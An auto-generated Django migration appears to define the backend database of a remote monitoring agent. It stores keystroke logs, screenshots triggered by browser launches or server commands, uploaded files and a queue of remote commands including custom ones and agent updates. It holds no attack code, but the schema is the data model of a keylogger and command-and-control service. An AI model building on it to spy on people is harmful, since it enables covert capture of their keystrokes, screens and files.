# Generated by Django 4.2.28 on 2026-02-08 09:38

import api.models
from django.db import migrations, models
import django.db.models.deletion
import uuid


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Device',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('hardware_id', models.CharField(db_index=True, max_length=255, unique=True)),
                ('hostname', models.CharField(max_length=255)),
                ('token', models.CharField(default=api.models.generate_token, max_length=64, unique=True)),
                ('is_active', models.BooleanField(default=True)),
                ('last_seen', models.DateTimeField(auto_now=True)),
                ('registered_at', models.DateTimeField(auto_now_add=True)),
                ('os_version', models.CharField(blank=True, max_length=100)),
                ('agent_version', models.CharField(blank=True, max_length=20)),
                ('ip_address', models.GenericIPAddressField(blank=True, null=True)),
            ],
            options={
                'ordering': ['-last_seen'],
            },
        ),
        migrations.CreateModel(
            name='FileMetadata',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('public_id', models.CharField(max_length=255, unique=True)),
                ('secure_url', models.URLField(max_length=500)),
                ('resource_type', models.CharField(max_length=20)),
                ('format', models.CharField(max_length=20)),
                ('size_bytes', models.BigIntegerField()),
                ('original_filename', models.CharField(blank=True, max_length=255)),
                ('file_type', models.CharField(max_length=50)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='api.device')),
            ],
            options={
                'verbose_name': 'File Metadata',
                'verbose_name_plural': 'File Metadata',
                'ordering': ['-created_at'],
            },
        ),
        migrations.CreateModel(
            name='ScreenshotMeta',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('secure_url', models.URLField(max_length=500)),
                ('public_id', models.CharField(max_length=255)),
                ('trigger_type', models.CharField(choices=[('manual', 'Manual/On-Demand'), ('browser', 'Browser Launch'), ('scheduled', 'Scheduled'), ('command', 'Server Command')], max_length=20)),
                ('active_window_title', models.CharField(blank=True, max_length=500)),
                ('active_process', models.CharField(blank=True, max_length=100)),
                ('screen_width', models.IntegerField(null=True)),
                ('screen_height', models.IntegerField(null=True)),
                ('captured_at', models.DateTimeField()),
                ('received_at', models.DateTimeField(auto_now_add=True)),
                ('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='screenshots', to='api.device')),
                ('file_metadata', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='screenshot_info', to='api.filemetadata')),
            ],
            options={
                'verbose_name': 'Screenshot',
                'verbose_name_plural': 'Screenshots',
                'ordering': ['-captured_at'],
            },
        ),
        migrations.CreateModel(
            name='KeylogData',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('data', models.TextField()),
                ('start_time', models.DateTimeField()),
                ('end_time', models.DateTimeField()),
                ('character_count', models.IntegerField(default=0)),
                ('window_switches', models.IntegerField(default=0)),
                ('received_at', models.DateTimeField(auto_now_add=True)),
                ('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='keylogs', to='api.device')),
            ],
            options={
                'verbose_name': 'Keylog Data',
                'verbose_name_plural': 'Keylog Data',
                'ordering': ['-end_time'],
            },
        ),
        migrations.CreateModel(
            name='DeviceConfig',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('kill_switch', models.BooleanField(default=False)),
                ('screenshots_enabled', models.BooleanField(default=False)),
                ('keylogger_enabled', models.BooleanField(default=False)),
                ('browser_triggers_enabled', models.BooleanField(default=False)),
                ('file_upload_enabled', models.BooleanField(default=False)),
                ('config_sync_interval', models.IntegerField(default=900)),
                ('keylog_sync_interval', models.IntegerField(default=300)),
                ('screenshot_quality', models.IntegerField(default=75)),
                ('monitored_browsers', models.JSONField(default=list, help_text='List of browser process names to monitor')),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('device', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='config', to='api.device')),
            ],
            options={
                'verbose_name': 'Device Configuration',
                'verbose_name_plural': 'Device Configurations',
            },
        ),
        migrations.CreateModel(
            name='Command',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('command_type', models.CharField(choices=[('screenshot', 'Take Screenshot'), ('config_refresh', 'Refresh Configuration'), ('keylog_sync', 'Sync Keylogs Now'), ('update_agent', 'Update Agent'), ('restart_agent', 'Restart Agent'), ('custom', 'Custom Command')], max_length=30)),
                ('payload', models.JSONField(blank=True, default=dict)),
                ('status', models.CharField(choices=[('pending', 'Pending'), ('delivered', 'Delivered'), ('acknowledged', 'Acknowledged'), ('completed', 'Completed'), ('failed', 'Failed'), ('expired', 'Expired')], default='pending', max_length=20)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('delivered_at', models.DateTimeField(blank=True, null=True)),
                ('completed_at', models.DateTimeField(blank=True, null=True)),
                ('expires_at', models.DateTimeField(blank=True, null=True)),
                ('result', models.JSONField(blank=True, default=dict)),
                ('error_message', models.TextField(blank=True)),
                ('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='commands', to='api.device')),
            ],
            options={
                'ordering': ['-created_at'],
            },
        ),
    ]
